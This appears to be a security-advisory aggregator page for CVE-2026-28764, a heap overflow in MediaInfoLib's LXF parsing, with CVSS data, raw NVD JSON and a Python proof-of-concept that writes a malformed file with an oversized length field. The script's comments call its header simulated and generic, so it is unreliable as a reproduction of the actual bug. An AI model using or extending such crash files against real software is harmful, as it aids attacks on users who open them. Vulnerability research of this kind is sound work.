Security Vulnerability Report
中文
CVE-2026-28764 CVSS 7.8 HIGH

CVE-2026-28764

Published: 2026-05-21 10:16:25
Last Modified: 2026-05-21 19:16:52

Description

MediaArea MediaInfoLib LXF element parsing heap-based buffer overflow vulnerability

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MediaInfoLib (受影响版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # PoC generation for MediaInfoLib LXF Heap Buffer Overflow # This script creates a malformed file with an oversized LXF element. def generate_poc(filename): with open(filename, 'wb') as f: # Generic header (simulated) f.write(b'LXF\x00') # Malicious element length # Triggering the overflow by setting a large size value malicious_size = 0xFFFFFFFF # Write size field f.write(struct.pack('<I', malicious_size)) # Write payload (junk data to overflow the buffer) # In a real exploit, this would contain shellcode or ROP chains payload = b'A' * 0x1000 f.write(payload) print(f"[+] PoC file generated: {filename}") if __name__ == "__main__": generate_poc("crash_lxf.bin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28764", "sourceIdentifier": "[email protected]", "published": "2026-05-21T10:16:25.090", "lastModified": "2026-05-21T19:16:52.123", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "MediaArea MediaInfoLib LXF element parsing heap-based buffer overflow vulnerability"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-823"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2026-2371", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2026-2371", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}